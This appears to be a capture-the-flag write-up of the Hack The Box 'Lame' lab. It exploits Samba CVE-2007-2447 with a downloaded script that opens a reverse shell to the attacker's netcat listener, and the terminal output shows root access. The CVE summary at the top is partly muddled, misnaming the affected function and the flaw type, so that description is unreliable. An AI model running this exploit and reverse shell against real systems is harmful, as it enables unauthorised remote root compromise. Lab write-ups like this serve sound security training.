CVE-2007-2447
a vulnerability was found in samba up to 3.0.0 (File Transfer Software). It has been rated as critical. This issue affects the function samrchangepassword of the file smb.conf. The manipulation with an unknown input leads to a privileges management vulnerability. Using CWE to declare the problem leads to CWE-269. The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. Impacted is confidentiality, integrity, and availability.
Exploit
I found an exploit online
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python2 CVE-2007-2447.py $IP 445 10.10.14.2 9999
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !Launching the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 45106
whoami
root
hostname
lame
ifconfig
eth0 link encap:Ethernet HWaddr 00:50:56:b9:b0:52
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:357094 errors:0 dropped:0 overruns:0 frame:0
tx packets:2900 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:26645106 (25.4 MB) TX bytes:436235 (426.0 KB)
interrupt:19 Base address:0x2024
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:16436 Metric:1
rx packets:512 errors:0 dropped:0 overruns:0 frame:0
tx packets:512 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
rx bytes:228769 (223.4 KB) TX bytes:228769 (223.4 KB)Initial Foothold established to the target system as the root user.
The Samba service was running with the privileges of the root user all along. Such as dangerous practice
System Level Compromise